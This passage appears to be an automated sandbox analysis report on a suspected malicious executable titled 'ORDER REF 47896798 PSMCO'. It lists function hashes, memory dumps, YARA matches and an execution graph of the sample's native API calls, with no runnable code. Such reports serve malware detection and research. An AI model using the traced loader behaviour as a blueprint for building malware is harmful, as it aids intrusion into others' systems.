                                                                                            • Opcode Fuzzy Hash: 08f5274a7fd135b5dda05748d2ef0bce9616a5ff7497143267ca8ff07fc3b88f
                                                                                            • Instruction Fuzzy Hash: 10E1F9B4E002599FDB14CF99C580AAEFBB2FF49304F248269D814A7356D734A942CFA1
                                                                                            Function 07834C68 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e810a9b131bda102f25296bc354c3ac5dd17748f19452e5ae67837ce054d081c
                                                                                            • Instruction ID: 1575ecfb7dffe2f529ab5fcb5a69e73ea2d0cad0b432b67cc275639eeeee7fd8
                                                                                            • Opcode Fuzzy Hash: e810a9b131bda102f25296bc354c3ac5dd17748f19452e5ae67837ce054d081c
                                                                                            • Instruction Fuzzy Hash: EFE11DB4E001598FDB14CFA9C590AAEFBB2FF89304F248269D414A7356D7359D42CFA1
                                                                                            Function 07836BE8 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c5917754792e99291e5ebb148356bae9c710cdaeacfb98ad5e1617d66c976b03
                                                                                            • Instruction ID: 4dc16812564eca34923d7d68e17322c0484eac063365d480e0dc17cbb4b59444
                                                                                            • Opcode Fuzzy Hash: c5917754792e99291e5ebb148356bae9c710cdaeacfb98ad5e1617d66c976b03
                                                                                            • Instruction Fuzzy Hash: FAE12DB4E001599FDB14CFA9C590AAEFBB2FF49304F248269D804AB355D735AD42CFA1
                                                                                            Function 07834830 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bb7a65c7a40a6406bbb16f22770b5c37442fd54e7349c1b5454b025b631ca4d7
                                                                                            • Instruction ID: 3eda81d5372959b07dee5a0a998c19e16fb765dd54b0d3e31376687d76424240
                                                                                            • Opcode Fuzzy Hash: bb7a65c7a40a6406bbb16f22770b5c37442fd54e7349c1b5454b025b631ca4d7
                                                                                            • Instruction Fuzzy Hash: 21E1FDB4E102598FDB14CF99C590AAEFBB2FF49304F248169D818A7356D7349D42CFA1
                                                                                            Function 0173D88C Relevance: .3, Instructions: 264COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2118492129.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1730000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ee6ccb7c7839992c7cca4f8c220267c86f77c11fbbd8b500881d3ba3bf3498cc
                                                                                            • Instruction ID: a7fb7a5adebe19f9a81dde74ed78a46e21337628a7c12289b21ce38b589c5bf6
                                                                                            • Opcode Fuzzy Hash: ee6ccb7c7839992c7cca4f8c220267c86f77c11fbbd8b500881d3ba3bf3498cc
                                                                                            • Instruction Fuzzy Hash: 49A16E32E00219CFCF19DFB8D84459EBBB2FFC5300B15856AE905AB266DB75E916CB40
                                                                                            Function 07EF99E9 Relevance: .2, Instructions: 239COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f08404140f22d4576c898a3b50bdbb85493e34e42eed6551f4582580e063d712
                                                                                            • Instruction ID: 0e6d99884861508f097678ec8cf72b5b95877a50f08027db82ec5d14dd3e9333
                                                                                            • Opcode Fuzzy Hash: f08404140f22d4576c898a3b50bdbb85493e34e42eed6551f4582580e063d712
                                                                                            • Instruction Fuzzy Hash: 09B172B5E016188FDB58CF6AD944ADDBBF2BF89300F14C1A9D509AB325DB305A858F50
                                                                                            Function 07EF9700 Relevance: .2, Instructions: 165COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 58fe30d03574e52438cfa8643151a9c4f086f458eb30c2ebf44db9841e1e016b
                                                                                            • Instruction ID: 2727e40e1412b88d8191421dd6a0c696a91d3cfe1f5eef43106af4133d002d95
                                                                                            • Opcode Fuzzy Hash: 58fe30d03574e52438cfa8643151a9c4f086f458eb30c2ebf44db9841e1e016b
                                                                                            • Instruction Fuzzy Hash: 0661EC71911A058FEB48DF7AE841A9ABFF2FBC4300F14D53AD118AB254DF786806DB91
                                                                                            Function 07EF9710 Relevance: .2, Instructions: 159COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cc5252fdefb7cd7264f62a15e9f0b05c82fd88b6aa04117b742f1c631ab8a920
                                                                                            • Instruction ID: b2fc4c5abcac4c115a1d5694dfc9be5b9d1117622dda284f63aa45f0c997147e
                                                                                            • Opcode Fuzzy Hash: cc5252fdefb7cd7264f62a15e9f0b05c82fd88b6aa04117b742f1c631ab8a920
                                                                                            • Instruction Fuzzy Hash: 3F61CB70911A098FE748DF6AE841A9ABFF2FBC4300F14D53AD118AB255DF786C06DB41

                                                                                            Execution Graph

                                                                                            Execution Coverage:1.2%
                                                                                            Dynamic/Decrypted Code Coverage:4.7%
                                                                                            Signature Coverage:7.3%
                                                                                            Total number of Nodes:150
                                                                                            Total number of Limit Nodes:12
                                                                                            execution_graph 94217 42fe23 94218 42fe33 94217->94218 94219 42fe39 94217->94219 94222 42ee63 94219->94222 94221 42fe5f 94225 42cfe3 94222->94225 94224 42ee7e 94224->94221 94226 42d000 94225->94226 94227 42d011 RtlAllocateHeap 94226->94227 94227->94224 94228 4252e3 94232 4252fc 94228->94232 94229 425344 94236 42ed83 94229->94236 94232->94229 94233 425384 94232->94233 94235 425389 94232->94235 94234 42ed83 RtlFreeHeap 94233->94234 94234->94235 94239 42d033 94236->94239 94238 425354 94240 42d050 94239->94240 94241 42d061 RtlFreeHeap 94240->94241 94241->94238 94242 42c2a3 94243 42c2bd 94242->94243 94246 1942df0 LdrInitializeThunk 94243->94246 94244 42c2e5 94246->94244 94275 424f53 94276 424f6f 94275->94276 94277 424f97 94276->94277 94278 424fab 94276->94278 94280 42ccc3 NtClose 94277->94280 94285 42ccc3 94278->94285 94282 424fa0 94280->94282 94281 424fb4 94288 42eea3 RtlAllocateHeap 94281->94288 94284 424fbf 94286 42cce0 94285->94286 94287 42ccf1 NtClose 94286->94287 94287->94281 94288->94284 94247 41ab43 94248 41ab5b 94247->94248 94250 41abb5 94247->94250 94248->94250 94251 41ea83 94248->94251 94252 41eaa9 94251->94252 94256 41eba6 94252->94256 94257 42ff53 94252->94257 94254 41eb44 94254->94256 94263 42c2f3 94254->94263 94256->94250 94258 42fec3 94257->94258 94259 42ee63 RtlAllocateHeap 94258->94259 94261 42ff20 94258->94261 94260 42fefd 94259->94260 94262 42ed83 RtlFreeHeap 94260->94262 94261->94254 94262->94261 94264 42c30d 94263->94264 94267 1942c0a 94264->94267 94265 42c339 94265->94256 94268 1942c11 94267->94268 94269 1942c1f LdrInitializeThunk 94267->94269 94268->94265 94269->94265 94270 4142c3 94271 4142e9 94270->94271 94273 414313 94271->94273 94274 414043 LdrInitializeThunk 94271->94274 94274->94273 94289 4193f3 94290 419423 94289->94290 94292 41944f 94290->94292 94293 41b873 94290->94293 94294 41b8b7 94293->94294 94295 41b8d8 94294->94295 94296 42ccc3 NtClose 94294->94296 94295->94290 94296->94295 94297 4145b3 94298 4145cd 94297->94298 94303 417d93 94298->94303 94300 4145eb 94301 414630 94300->94301 94302 41461f PostThreadMessageW 94300->94302 94302->94301 94304 417d94 94303->94304 94305 417df3 LdrLoadDll 94304->94305 94306 417dbe 94304->94306 94305->94306 94306->94300 94307 1942b60 LdrInitializeThunk 94308 401c17 94309 401c30 94308->94309 94312 4302f3 94309->94312 94310 401cbb 94310->94310 94315 42e943 94312->94315 94316 42e969 94315->94316 94327 407723 94316->94327 94318 42e97f 94326 42e9db 94318->94326 94330 41b683 94318->94330 94320 42e99e 94321 42e9b3 94320->94321 94345 42d083 94320->94345 94341 428833 94321->94341 94324 42e9cd 94325 42d083 ExitProcess 94324->94325 94325->94326 94326->94310 94329 407730 94327->94329 94348 416a43 94327->94348 94329->94318 94331 41b6af 94330->94331 94359 41b573 94331->94359 94334 41b6f4 94337 41b710 94334->94337 94339 42ccc3 NtClose 94334->94339 94335 41b6dc 94336 42ccc3 NtClose 94335->94336 94338 41b6e7 94335->94338 94336->94338 94337->94320 94338->94320 94340 41b706 94339->94340 94340->94320 94342 428895 94341->94342 94344 4288a2 94342->94344 94370 418c13 94342->94370 94344->94324 94346 42d09d 94345->94346 94347 42d0ae ExitProcess 94346->94347 94347->94321 94349 416a58 94348->94349 94351 416a76 94349->94351 94352 42d733 94349->94352 94351->94329 94354 42d74d 94352->94354 94353 42d77c 94353->94351 94354->94353 94355 42c2f3 LdrInitializeThunk 94354->94355 94356 42d7d9 94355->94356 94357 42ed83 RtlFreeHeap 94356->94357 94358 42d7ec 94357->94358 94358->94351 94360 41b58d 94359->94360 94364 41b669 94359->94364 94365 42c393 94360->94365 94363 42ccc3 NtClose 94363->94364 94364->94334 94364->94335 94366 42c3ad 94365->94366 94369 19435c0 LdrInitializeThunk 94366->94369 94367 41b65d 94367->94363 94369->94367 94372 418c3d 94370->94372 94371 41913b 94371->94344 94372->94371 94378 414223 94372->94378 94374 418d6a 94374->94371 94375 42ed83 RtlFreeHeap 94374->94375 94376 418d82 94375->94376 94376->94371 94377 42d083 ExitProcess 94376->94377 94377->94371 94382 41422b 94378->94382 94379 4142ac 94379->94374 94382->94379 94383 41b993 94382->94383 94384 41b9b8 94383->94384 94390 429fd3 94384->94390 94386 4142a2 94386->94374 94388 41b9e9 94388->94386 94389 42ed83 RtlFreeHeap 94388->94389 94395 41b7d3 LdrInitializeThunk 94388->94395 94389->94388 94391 42a037 94390->94391 94392 42a06a 94391->94392 94396 414083 94391->94396 94392->94388 94394 42a04c 94394->94388 94395->94388 94397 414051 94396->94397 94398 414090 94396->94398 94401 42cf43 94397->94401 94398->94394 94402 42cf60 94401->94402 94405 1942c70 LdrInitializeThunk 94402->94405 94403 414062 94403->94394 94405->94403

                                                                                            Executed Functions

                                                                                            Function 00417D93 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 238 417d93-417dbc call 42f963 242 417dc2-417dd0 call 42ff63 238->242 243 417dbe-417dc1 238->243 246 417de0-417df1 call 42e413 242->246 247 417dd2-417ddd call 430203 242->247 252 417df3-417e07 LdrLoadDll 246->252 253 417e0a-417e0d 246->253 247->246 252->253
                                                                                            APIs
                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417E05
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Load
                                                                                            • String ID:
                                                                                            • API String ID: 2234796835-0
                                                                                            • Opcode ID: f729aad71b325cdb97dbeb40763933413b5d6b7fb509c19989d913dea0fc555e
                                                                                            • Instruction ID: 385d25a5890e535b671e8489fc5c15413f11f33979a04f95b97c19e2b76df75d
                                                                                            • Opcode Fuzzy Hash: f729aad71b325cdb97dbeb40763933413b5d6b7fb509c19989d913dea0fc555e
                                                                                            • Instruction Fuzzy Hash: 720112B5E0020DA7DF10DAA5DC42FDEB7789B54308F4041AAE91897241F635EB588795
                                                                                            Function 0042CCC3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 264 42ccc3-42ccff call 404a63 call 42df13 NtClose
                                                                                            APIs
                                                                                            • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CCFA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: 081854369c831ec027b45b511c34f41f77e81ad7b19e29eddcfbdd3c68e28a6d
                                                                                            • Instruction ID: 491dd4956e3916c0e9f385bdf292c0db9586272939a91a9bce0c87017d490f7f
                                                                                            • Opcode Fuzzy Hash: 081854369c831ec027b45b511c34f41f77e81ad7b19e29eddcfbdd3c68e28a6d
                                                                                            • Instruction Fuzzy Hash: CAE04F713002147BC520EA5ADC41F9B775CDFC5714F404419FA4867241C771B90187B5
                                                                                            Function 01942B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 278 1942b60-1942b6c LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: a2986942f912986ad9d35b6065559cfff9edf2fc54500051fb01ad50af5466c0
                                                                                            • Instruction ID: 781bdac44dcaa942e305f41a13ad1a71c9294f0a9537ecd9ef78c0f0dad760b4
                                                                                            • Opcode Fuzzy Hash: a2986942f912986ad9d35b6065559cfff9edf2fc54500051fb01ad50af5466c0
                                                                                            • Instruction Fuzzy Hash: 8D900261202500034245B1594418616804E97E0201B55C021F5055590DC52589916725
                                                                                            Function 01942DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 5e923df62e25c337fe6d463c3553fc1feadbaac9da54bb36f1dea9c41fa669a8
                                                                                            • Instruction ID: b88ec5dfcee6c88d97523c6223c1000f824802ea6d0b3becf0bf10ae39d0a0b4
                                                                                            • Opcode Fuzzy Hash: 5e923df62e25c337fe6d463c3553fc1feadbaac9da54bb36f1dea9c41fa669a8
                                                                                            • Instruction Fuzzy Hash: 6390023120150413D251B1594508707404D97D0241F95C412B4465558DD6568A52A721
                                                                                            Function 01942C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: c18d06a56d005c348813f5255d8ace877cd0c045bb3838374f6f65182b0766a8
                                                                                            • Instruction ID: 4fa48646e9f6e5bf8766a49ffc639f747e4e0d585fe0712b5b6681a78226a8ab
                                                                                            • Opcode Fuzzy Hash: c18d06a56d005c348813f5255d8ace877cd0c045bb3838374f6f65182b0766a8
                                                                                            • Instruction Fuzzy Hash: 8D90023120158802D250B159840874A404997D0301F59C411B8465658DC69589917721
                                                                                            Function 019435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 8c276de4c4438852bad5cbfbdd9bdd06b760b602b1166b4a464b1f9c37687da5
                                                                                            • Instruction ID: 695c8cae8014269572ea4c06d69936cedbfc6ac427fced88eb6c39818b69df1f
                                                                                            • Opcode Fuzzy Hash: 8c276de4c4438852bad5cbfbdd9bdd06b760b602b1166b4a464b1f9c37687da5
                                                                                            • Instruction Fuzzy Hash: 6490023160560402D240B1594518706504997D0201F65C411B4465568DC7958A516BA2
                                                                                            Function 00414545 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: D7825j9$D7825j9
                                                                                            • API String ID: 0-479102426
                                                                                            • Opcode ID: df20b4b58c554ac0c4dc47cdb80d5ce8067fd209ea73ad874dc7f26add9bc350
                                                                                            • Instruction ID: fdfec03389ff8d0d5fb4535a71bf58f746a23e156887118081a355f29c6d436d
                                                                                            • Opcode Fuzzy Hash: df20b4b58c554ac0c4dc47cdb80d5ce8067fd209ea73ad874dc7f26add9bc350
                                                                                            • Instruction Fuzzy Hash: F8219E72900228BFCB219AA59CC1DDFFBBCDEC5728B40865AF58497502C6399D478791
                                                                                            Function 004145B1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 22 4145b1-4145c5 23 4145cd-41461d call 42f833 call 417d93 call 4049d3 call 425423 22->23 24 4145c8 call 42ee23 22->24 33 41463d-414643 23->33 34 41461f-41462e PostThreadMessageW 23->34 24->23 34->33 35 414630-41463a 34->35 35->33
                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(D7825j9,00000111,00000000,00000000), ref: 0041462A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID: D7825j9$D7825j9
                                                                                            • API String ID: 1836367815-479102426
                                                                                            • Opcode ID: 994b2baca817a775ab033900383bfd5bf9339bcaebf1deb497ed5a9e65605e91
                                                                                            • Instruction ID: 07308d344231523ff006cd4a3a6d710053bcb018325491c76687a8e41311cea5
                                                                                            • Opcode Fuzzy Hash: 994b2baca817a775ab033900383bfd5bf9339bcaebf1deb497ed5a9e65605e91
                                                                                            • Instruction Fuzzy Hash: 0D0108B1D0025C7AEB10AAE19C82DEFBB7C9F8179CF448069F904B7141D67C4E068BA5
                                                                                            Function 004145B3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 36 4145b3-4145c5 37 4145cd-41461d call 42f833 call 417d93 call 4049d3 call 425423 36->37 38 4145c8 call 42ee23 36->38 47 41463d-414643 37->47 48 41461f-41462e PostThreadMessageW 37->48 38->37 48->47 49 414630-41463a 48->49 49->47
                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(D7825j9,00000111,00000000,00000000), ref: 0041462A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID: D7825j9$D7825j9
                                                                                            • API String ID: 1836367815-479102426
                                                                                            • Opcode ID: 6bfd8d0c22e0fa00295c46644b34a77d52c024928958fe0a7e538a0ad19628b1
                                                                                            • Instruction ID: 29429dc466ea38f9ee7d023a718d0d20093d2d2b0bd9a22da0fd0cacc4ae9ed7
                                                                                            • Opcode Fuzzy Hash: 6bfd8d0c22e0fa00295c46644b34a77d52c024928958fe0a7e538a0ad19628b1
                                                                                            • Instruction Fuzzy Hash: BA01C8B1D0025C7ADB10AAE19C82DEFBB7C9F81758F408069F90467141D67C5E0647A5
                                                                                            Function 0042D033 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 259 42d033-42d077 call 404a63 call 42df13 RtlFreeHeap
                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,13A0E445,00000007,00000000,00000004,00000000,00417604,000000F4), ref: 0042D072
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: 60ff4789dde42194b856a07be318009ab749fac2426b1be3e6f4cf8e154f64d5
                                                                                            • Instruction ID: 377c83c61a208b248498eacd654a30d0caa489a199ddfc83a98deeb9492c08bc
                                                                                            • Opcode Fuzzy Hash: 60ff4789dde42194b856a07be318009ab749fac2426b1be3e6f4cf8e154f64d5
                                                                                            • Instruction Fuzzy Hash: 32E09AB2604204BBDA10EE99EC41F9B73ECEFC8714F00001AFA08B7242C671BD108BB8
                                                                                            Function 0042CFE3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 254 42cfe3-42d027 call 404a63 call 42df13 RtlAllocateHeap
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(?,0041EB44,?,?,00000000,?,0041EB44,?,?,?), ref: 0042D022
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: 1e5b17512e1e55516f8326c9c16891b6268a9042548c139125952dda1877ec81
                                                                                            • Instruction ID: f0988cf84ecf2190b66b4d66ddb23bf1359071760aad22573dab5754c81dd051
                                                                                            • Opcode Fuzzy Hash: 1e5b17512e1e55516f8326c9c16891b6268a9042548c139125952dda1877ec81
                                                                                            • Instruction Fuzzy Hash: 61E06D716442057FCA14EF59DC41F9B77ACDFC8710F000019F908A7242D770B9118BB8
                                                                                            Function 0042D083 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 269 42d083-42d0bc call 404a63 call 42df13 ExitProcess
                                                                                            APIs
                                                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,313397DD,?,?,313397DD), ref: 0042D0B7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: 8548100c12659e7f60cf6d297a0857bfa3cf992d76b92ca8445e0e6cfb24f460
                                                                                            • Instruction ID: 526304a0a7fea171b927583e1600790b502b234eda972d78423b64fab7b68b37
                                                                                            • Opcode Fuzzy Hash: 8548100c12659e7f60cf6d297a0857bfa3cf992d76b92ca8445e0e6cfb24f460
                                                                                            • Instruction Fuzzy Hash: D3E086752402147BDA20EB5ADC41FD7779CDFC5710F404429FA09A7142C675BA4187F8
                                                                                            Function 01942C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 274 1942c0a-1942c0f 275 1942c11-1942c18 274->275 276 1942c1f-1942c26 LdrInitializeThunk 274->276
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 2853b0bf168de2edc9cdd16f8a53fadb0e8054a3cf21c660245a470b6986e42b
                                                                                            • Instruction ID: ffda595f58be86621a48712c972bbf4c2eb58e511873b095641db5e5f09c3a0b
                                                                                            • Opcode Fuzzy Hash: 2853b0bf168de2edc9cdd16f8a53fadb0e8054a3cf21c660245a470b6986e42b
                                                                                            • Instruction Fuzzy Hash: 92B09B71D015C5C6DB51E764560CB17794477D0702F15C061F2070641F4778C1D1E775

                                                                                            Non-executed Functions

                                                                                            Function 01982349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
